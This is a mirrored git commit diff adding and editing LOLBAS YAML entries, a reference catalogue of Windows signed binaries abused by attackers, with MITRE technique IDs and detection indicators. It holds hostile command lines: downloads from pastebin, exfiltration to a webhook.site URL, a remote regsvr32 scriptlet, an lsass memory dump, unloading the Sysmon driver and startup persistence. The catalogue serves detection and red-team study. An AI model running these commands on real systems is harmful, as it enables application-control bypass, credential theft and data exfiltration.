mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
Merge branch 'master' into fixing-yaml-issues
This commit is contained in:
commit
a55e2249c1
18
yml/LOLUtilz/OtherBinaries/Upload.yml
Normal file
18
yml/LOLUtilz/OtherBinaries/Upload.yml
Normal file
@ -0,0 +1,18 @@
|
||||
---
|
||||
Name: Update.exe
|
||||
Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation.
|
||||
Author: 'Jesus Galvez'
|
||||
Created: '2020-11-01'
|
||||
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||
Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied.
|
||||
Usecase: Execute binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 7 and up with Whatsapp installed
|
||||
Full_Path:
|
||||
- Path: '%localappdata%\Whatsapp\Update.exe'
|
||||
Detection:
|
||||
- IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process
|
||||
---
|
22
yml/OSBinaries/AppInstaller.yml
Normal file
22
yml/OSBinaries/AppInstaller.yml
Normal file
@ -0,0 +1,22 @@
|
||||
---
|
||||
Name: AppInstaller.exe
|
||||
Description: Tool used for installation of AppX/MSIX applications on Windows 10
|
||||
Author: 'Wade Hickey'
|
||||
Created: '2020-12-02'
|
||||
Commands:
|
||||
- Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
|
||||
Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>
|
||||
Usecase: Download file from Internet
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
|
||||
Resources:
|
||||
- Link: https://twitter.com/notwhickey/status/1333900137232523264
|
||||
Acknowledgement:
|
||||
- Person: Wade Hickey
|
||||
Handle: '@notwhickey'
|
||||
---
|
28
yml/OSBinaries/Aspnet_Compiler.yml
Normal file
28
yml/OSBinaries/Aspnet_Compiler.yml
Normal file
@ -0,0 +1,28 @@
|
||||
---
|
||||
Name: Aspnet_Compiler.exe
|
||||
Description: ASP.NET Compilation Tool
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
|
||||
Description: Execute C# code with the Build Provider and proper folder structure in place.
|
||||
Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
|
||||
- Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
|
||||
Code_Sample:
|
||||
- Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
|
||||
Detection:
|
||||
- IOC: Sysmon Event ID 1 - Process Creation
|
||||
Resources:
|
||||
- Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
|
||||
- Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
|
||||
Acknowledgement:
|
||||
- Person: cpl
|
||||
Handle: '@cpl3h'
|
||||
---
|
@ -1,6 +1,6 @@
|
||||
---
|
||||
Name: Certutil.exe
|
||||
Description: Windows binary used for handeling certificates
|
||||
Description: Windows binary used for handling certificates
|
||||
Author: 'Oddvar Moe'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
|
@ -4,7 +4,7 @@ Description: The command-line interpreter in Windows
|
||||
Author: 'Ye Yint Min Thu Htut'
|
||||
Created: 2019-06-26
|
||||
Commands:
|
||||
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
||||
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
||||
Description: Add content to an Alternate Data Stream (ADS).
|
||||
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||
Category: ADS
|
||||
|
30
yml/OSBinaries/DataSvcUtil.yml
Normal file
30
yml/OSBinaries/DataSvcUtil.yml
Normal file
@ -0,0 +1,30 @@
|
||||
---
|
||||
Name: DataSvcUtil.exe
|
||||
Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
|
||||
Author: 'Ialle Teixeira'
|
||||
Created: '01/12/2020'
|
||||
Commands:
|
||||
- Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile
|
||||
Description: Upload file, credentials or data exfiltration in general
|
||||
Usecase: Upload file
|
||||
Category: Upload
|
||||
Privileges: User
|
||||
MitreID: T1567
|
||||
MitreLink: https://attack.mitre.org/techniques/T1567/
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe
|
||||
Code_Sample:
|
||||
- Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6
|
||||
Detection:
|
||||
- IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory.
|
||||
- IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS.
|
||||
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.
|
||||
Resources:
|
||||
- Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe
|
||||
- Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services
|
||||
- Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services
|
||||
Acknowledgement:
|
||||
- Person: Ialle Teixeira
|
||||
Handle: '@NtSetDefault'
|
||||
---
|
30
yml/OSBinaries/Dllhost.yml
Normal file
30
yml/OSBinaries/Dllhost.yml
Normal file
@ -0,0 +1,30 @@
|
||||
---
|
||||
Name: Dllhost.exe
|
||||
Description: Used by Windows to DLL Surrogate COM Objects
|
||||
Author: 'Nasreddine Bencherchali'
|
||||
Created: '2020-11-07'
|
||||
Commands:
|
||||
- Command: dllhost.exe /Processid:{CLSID}
|
||||
Description: Use dllhost.exe to load a registered or hijacked COM Server payload.
|
||||
Usecase: Execute a DLL Surrogate COM Object.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1546.015
|
||||
MitreLink: https://attack.mitre.org/techniques/T1546/015/
|
||||
OperatingSystem: Windows 10 (and likely previous versions)
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\dllhost.exe
|
||||
- Path: C:\Windows\SysWOW64\dllhost.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://twitter.com/CyberRaiju/status/1167415118847598594
|
||||
- Link: https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08
|
||||
Acknowledgement:
|
||||
- Person: Jai Minton
|
||||
Handle: '@CyberRaiju'
|
||||
- Person: Nasreddine Bencherchali
|
||||
Handle: '@nas_bench'
|
||||
---
|
@ -42,7 +42,7 @@ Full_Path:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: finstr.exe should normally not be invoked on a client system
|
||||
- IOC: findstr.exe should normally not be invoked on a client system
|
||||
Resources:
|
||||
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
|
22
yml/OSBinaries/IMEWDBLD.yml
Normal file
22
yml/OSBinaries/IMEWDBLD.yml
Normal file
@ -0,0 +1,22 @@
|
||||
---
|
||||
Name: IMEWDBLD.exe
|
||||
Description: Microsoft IME Open Extended Dictionary Module
|
||||
Author: 'Wade Hickey'
|
||||
Created: '2020-03-05'
|
||||
Commands:
|
||||
- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
|
||||
Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
|
||||
Usecase: Download file from Internet
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
|
||||
Resources:
|
||||
- Link: https://twitter.com/notwhickey/status/1367493406835040265
|
||||
Acknowledgement:
|
||||
- Person: Wade Hickey
|
||||
Handle: '@notwhickey'
|
||||
---
|
@ -20,6 +20,14 @@ Commands:
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: msbuild.exe project.proj
|
||||
Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
|
||||
Usecase: Execute project file that contains XslTransformation tag parameters
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
|
||||
@ -27,6 +35,7 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
||||
- Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
@ -36,9 +45,12 @@ Resources:
|
||||
- Link: https://github.com/Cn33liz/MSBuildShell
|
||||
- Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
|
||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
- Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
- Person: Cn33liz
|
||||
Handle: '@Cneelis'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
23
yml/OSBinaries/Pnputil.yml
Normal file
23
yml/OSBinaries/Pnputil.yml
Normal file
@ -0,0 +1,23 @@
|
||||
---
|
||||
Name: Pnputil.exe
|
||||
Description: used for Install drivers.
|
||||
Author: Hai vaknin (lux)
|
||||
Created: 25/12/2020
|
||||
Commands:
|
||||
- Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf
|
||||
Description: used for Install drivers
|
||||
Usecase: add malicious driver.
|
||||
Category: Execute
|
||||
Privileges: Administrator
|
||||
MitreID: T1215
|
||||
MitreLink: https://attack.mitre.org/techniques/T1215
|
||||
OperatingSystem: Windows 10,7
|
||||
Full_Path:
|
||||
- Path: C:\Windows\system32\pnputil.exe
|
||||
Code_Sample: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf
|
||||
Acknowledgement:
|
||||
- Person: Hai Vaknin(Lux)
|
||||
Handle: 'LuxNoBulIshit'
|
||||
- Person: Avihay eldad
|
||||
Handle: 'aloneliassaf'
|
||||
---
|
@ -11,7 +11,7 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
|
||||
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
|
||||
|
@ -19,6 +19,7 @@ Code_Sample:
|
||||
Detection:
|
||||
- IOC: wsreset.exe launching child process other than mmc.exe
|
||||
- IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command
|
||||
- IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen
|
||||
Resources:
|
||||
- Link: https://www.activecyber.us/activelabs/windows-uac-bypass
|
||||
- Link: https://twitter.com/ihack4falafel/status/1106644790114947073
|
||||
|
26
yml/OSBinaries/fltMC.yml
Normal file
26
yml/OSBinaries/fltMC.yml
Normal file
@ -0,0 +1,26 @@
|
||||
---
|
||||
Name: fltMC.exe
|
||||
Description: Filter Manager Control Program used by Windows
|
||||
Author: 'John Lambert'
|
||||
Created: '2021-09-18'
|
||||
Commands:
|
||||
- Command: fltMC.exe unload SysmonDrv
|
||||
Description: Unloads a driver used by security agents
|
||||
Usecase: Defense evasion
|
||||
Category: ADS
|
||||
Privileges: Admin
|
||||
MitreID: T1562
|
||||
MitreLink: https://attack.mitre.org/techniques/T1562/002/
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\fltMC.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: 4688 events with fltMC.exe
|
||||
Resources:
|
||||
- Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
|
||||
Acknowledgement:
|
||||
- Person: Carlos Perez
|
||||
Handle: '@Carlos_Perez'
|
||||
---
|
26
yml/OSScripts/CL_LoadAssembly.yml
Normal file
26
yml/OSScripts/CL_LoadAssembly.yml
Normal file
@ -0,0 +1,26 @@
|
||||
---
|
||||
Name: CL_LoadAssembly.ps1
|
||||
Description: PowerShell Diagnostic Script
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()'
|
||||
Description: Proxy execute Managed DLL with PowerShell
|
||||
Usecase: Execute proxied payload with Microsoft signed binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1059.001
|
||||
MitreLink: https://attack.mitre.org/techniques/T1059/001/
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well)
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
26
yml/OSScripts/UtilityFunctions.yml
Normal file
26
yml/OSScripts/UtilityFunctions.yml
Normal file
@ -0,0 +1,26 @@
|
||||
---
|
||||
Name: UtilityFunctions.ps1
|
||||
Description: PowerShell Diagnostic Script
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”'
|
||||
Description: Proxy execute Managed DLL with PowerShell
|
||||
Usecase: Execute proxied payload with Microsoft signed binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1059.001
|
||||
MitreLink: https://attack.mitre.org/techniques/T1059/001/
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well)
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://twitter.com/nickvangilder/status/1441003666274668546
|
||||
Acknowledgement:
|
||||
- Person: Nick VanGilder
|
||||
Handle: '@nickvangilder'
|
||||
---
|
27
yml/OtherMSBinaries/Adplus.yml
Normal file
27
yml/OtherMSBinaries/Adplus.yml
Normal file
@ -0,0 +1,27 @@
|
||||
---
|
||||
Name: adplus.exe
|
||||
Description: Debugging tool included with Windows Debugging Tools
|
||||
Author: mr.d0x
|
||||
Created: 1/9/2021
|
||||
Commands:
|
||||
- Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet
|
||||
Description: Creates a memory dump of the lsass process
|
||||
Usecase: Create memory dump and parse it offline
|
||||
Category: Dump
|
||||
Privileges: SYSTEM
|
||||
MitreID: T1003
|
||||
MitreLink: https://attack.mitre.org/techniques/T1003/
|
||||
OperatingSystem: All Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
|
||||
Acknowledgement:
|
||||
- Person: mr.d0x
|
||||
Handle: '@mrd0x'
|
||||
---
|
@ -12,6 +12,16 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: |
|
||||
cdb.exe -pd -pn <process_name>
|
||||
.shell <cmd>
|
||||
Description: Attaching to any process and executing shell commands
|
||||
Usecase: Run a shell command under a trusted Microsoft signed binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID:
|
||||
MitreLink:
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
|
||||
@ -23,7 +33,12 @@ Resources:
|
||||
- Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
|
||||
- Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
|
||||
- Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
|
||||
Acknowledgement:
|
||||
- Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/
|
||||
Acknoledgement:
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
- Person: mr.d0x
|
||||
Handle: '@mrd0x'
|
||||
- Person: Spooky Sec
|
||||
Handle: '@sec_spooky'
|
||||
---
|
38
yml/OtherMSBinaries/Fsi.yml
Normal file
38
yml/OtherMSBinaries/Fsi.yml
Normal file
@ -0,0 +1,38 @@
|
||||
---
|
||||
Name: Fsi.exe
|
||||
Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: fsi.exe c:\path\to\test.fsscript
|
||||
Description: Execute F# code via script file
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
MitreLink: https://attack.mitre.org/techniques/T1059/
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
- Command: fsi.exe
|
||||
Description: Execute F# code via interactive command line
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
MitreLink: https://attack.mitre.org/techniques/T1059/
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
|
||||
Code_Sample:
|
||||
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
|
||||
Detection:
|
||||
- IOC: Sysmon Event ID 1 - Process Creation
|
||||
Resources:
|
||||
- Link: https://twitter.com/NickTyrer/status/904273264385589248
|
||||
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
|
||||
Acknowledgement:
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@NickTyrer'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
36
yml/OtherMSBinaries/FsiAnyCpu.yml
Normal file
36
yml/OtherMSBinaries/FsiAnyCpu.yml
Normal file
@ -0,0 +1,36 @@
|
||||
---
|
||||
Name: FsiAnyCpu.exe
|
||||
Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio.
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: fsianycpu.exe c:\path\to\test.fsscript
|
||||
Description: Execute F# code via script file
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
MitreLink: https://attack.mitre.org/techniques/T1059/
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
- Command: fsianycpu.exe
|
||||
Description: Execute F# code via interactive command line
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
MitreLink: https://attack.mitre.org/techniques/T1059/
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
|
||||
Code_Sample:
|
||||
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
|
||||
Detection:
|
||||
- IOC: Sysmon Event ID 1 - Process Creation
|
||||
Resources:
|
||||
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
|
||||
Acknowledgement:
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@NickTyrer'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
43
yml/OtherMSBinaries/Remote.yml
Normal file
43
yml/OtherMSBinaries/Remote.yml
Normal file
@ -0,0 +1,43 @@
|
||||
---
|
||||
Name: Remote.exe
|
||||
Description: Debugging tool included with Windows Debugging Tools
|
||||
Author: mr.d0x
|
||||
Created: 1/6/2021
|
||||
Commands:
|
||||
- Command: Remote.exe /s "powershell.exe" anythinghere
|
||||
Description: Spawns powershell as a child process of remote.exe
|
||||
Usecase: Executes a process under a trusted Microsoft signed binary
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID:
|
||||
MitreLink:
|
||||
OperatingSystem:
|
||||
- Command: Remote.exe /s "powershell.exe" anythinghere
|
||||
Description: Spawns powershell as a child process of remote.exe
|
||||
Usecase: Executes a process under a trusted Microsoft signed binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID:
|
||||
MitreLink:
|
||||
OperatingSystem:
|
||||
- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
|
||||
Description: Run a remote file
|
||||
Usecase: Executing a remote binary without saving file to disk
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID:
|
||||
MitreLink:
|
||||
OperatingSystem:
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: remote.exe spawned
|
||||
Resources:
|
||||
- Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
|
||||
Acknowledgement:
|
||||
- Person: mr.d0x
|
||||
Handle: '@mrd0x'
|
||||
---
|
@ -92,6 +92,22 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: Update.exe --createShortcut=payload.exe -l=Startup
|
||||
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
|
||||
Usecase: Execute binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1547
|
||||
MitreLink: https://attack.mitre.org/techniques/T1547/001/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
- Command: Update.exe --removeShortcut=payload.exe -l=Startup
|
||||
Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
|
||||
Usecase: Execute binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1070
|
||||
MitreLink: https://attack.mitre.org/techniques/T1070/
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Full_Path:
|
||||
- Path: '%localappdata%\Microsoft\Teams\update.exe'
|
||||
Code_Sample:
|
||||
@ -114,4 +130,5 @@ Acknowledgement:
|
||||
Handle: '@MrUn1k0d3r'
|
||||
- Person: Adam
|
||||
Handle: '@Hexacorn'
|
||||
- Person: Jesus Galvez
|
||||
---
|
||||
|
26
yml/OtherMSBinaries/VSIISExeLauncher.yml
Normal file
26
yml/OtherMSBinaries/VSIISExeLauncher.yml
Normal file
@ -0,0 +1,26 @@
|
||||
---
|
||||
Name: VSIISExeLauncher.exe
|
||||
Description: Binary will execute specified binary. Part of VS/VScode installation.
|
||||
Author: 'timwhite'
|
||||
Created: '2021-09-24'
|
||||
Commands:
|
||||
- Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here"
|
||||
Description: The above binary will execute other binary.
|
||||
Usecase: Execute any binary with given arguments.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 10 and up with VS/VScode installed
|
||||
Full_Path:
|
||||
- Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe'
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: VSIISExeLauncher.exe spawned an unknown process
|
||||
Resources:
|
||||
- Link: https://github.com/timwhitez
|
||||
Acknowledgement:
|
||||
- Person: timwhite
|
||||
Handle:
|
||||
---
|
31
yml/OtherMSBinaries/VisualUiaVerifyNative.yml
Normal file
31
yml/OtherMSBinaries/VisualUiaVerifyNative.yml
Normal file
@ -0,0 +1,31 @@
|
||||
---
|
||||
Name: VisualUiaVerifyNative.exe
|
||||
Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: VisualUiaVerifyNative.exe
|
||||
Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing.
|
||||
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/techniques/T1218/
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Full_Path:
|
||||
